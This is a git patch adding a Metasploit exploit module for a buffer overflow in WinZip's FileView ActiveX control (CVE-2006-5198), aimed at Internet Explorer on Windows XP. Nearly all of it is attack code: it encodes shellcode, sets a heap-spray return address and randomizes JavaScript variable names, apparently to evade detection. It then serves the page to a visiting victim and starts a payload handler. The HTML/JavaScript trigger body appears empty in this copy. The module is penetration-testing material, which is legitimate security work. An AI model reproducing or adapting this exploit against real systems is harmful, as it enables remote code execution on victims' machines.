From bc1f2da25421c1a4937901bd49167cc07dc69c94 Mon Sep 17 00:00:00 2001 From: Mario Ceballos Date: Tue, 13 Jan 2009 14:04:53 +0000 Subject: [PATCH] added exploit module winzip_fileview.rb from dean. git-svn-id: file:///home/svn/framework3/trunk@6144 4d416f70-5f16-0410-b530-b9f4589650da --- .../windows/browser/winzip_fileview.rb | 112 ++++++++++++++++++ 1 file changed, 112 insertions(+) create mode 100644 modules/exploits/windows/browser/winzip_fileview.rb diff --git a/modules/exploits/windows/browser/winzip_fileview.rb b/modules/exploits/windows/browser/winzip_fileview.rb new file mode 100644 index 0000000000..c3aadc53de --- /dev/null +++ b/modules/exploits/windows/browser/winzip_fileview.rb @@ -0,0 +1,112 @@ +### +## This file is part of the Metasploit Framework and may be subject to +## redistribution and commercial restrictions. Please see the Metasploit +## Framework web site for more information on licensing and terms of use. +## http://metasploit.com/projects/Framework/ +### + +require 'msf/core' + + +class Metasploit3 < Msf::Exploit::Remote + + include Msf::Exploit::Remote::HttpServer::HTML + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'WinZip FileView (WZFILEVIEW.FileViewCtrl.61) ActiveX Buffer Overflow', + 'Description' => %q{ + The FileView ActiveX control (WZFILEVIEW.FileViewCtrl.61) could allow a + remote attacker to execute arbitrary code on the system. The control contains + several unsafe methods and is marked safe for scripting and safe for initialization. + A remote attacker could exploit this vulnerability to execute arbitrary code on the + victim system. WinZip 10.0 <= Build 6667 are vulnerable. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'dean dean [at] zerodaysolutions [dot] com' ], + 'Version' => '$Revision:$', + 'References' => + [ + [ 'CVE','CVE-2006-5198' ], + [ 'BID','20160' ], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Payload' => + { + 'Space' => 1024, + 'BadChars' => "\x00", + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows XP SP0-SP2/ IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0c0c0c0c } ] + ], + 'DisclosureDate' => 'Nov 2 2007', + 'DefaultTarget' => 0)) + end + + def autofilter + false + end + + def check_dependencies + use_zlib + end + + def on_request_uri(cli, request) + # Re-generate the payload. + return if ((p = regenerate_payload(cli)) == nil) + + # Encode the shellcode. + shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) + + # Set the return. + ret = Rex::Text.uri_encode([target.ret].pack('L')) + + # Randomize the javascript variable names. + vname = rand_text_alpha(rand(100) + 1) + var_i = rand_text_alpha(rand(30) + 2) + rand1 = rand_text_alpha(rand(100) + 1) + rand2 = rand_text_alpha(rand(100) + 1) + rand3 = rand_text_alpha(rand(100) + 1) + rand4 = rand_text_alpha(rand(100) + 1) + rand5 = rand_text_alpha(rand(100) + 1) + rand6 = rand_text_alpha(rand(100) + 1) + rand7 = rand_text_alpha(rand(100) + 1) + rand8 = rand_text_alpha(rand(100) + 1) + + content = %Q| + + + + + | + + print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") + + # Transmit the response to the client + send_response_html(cli, content) + + # Handle the payload + handler(cli) + end + +end +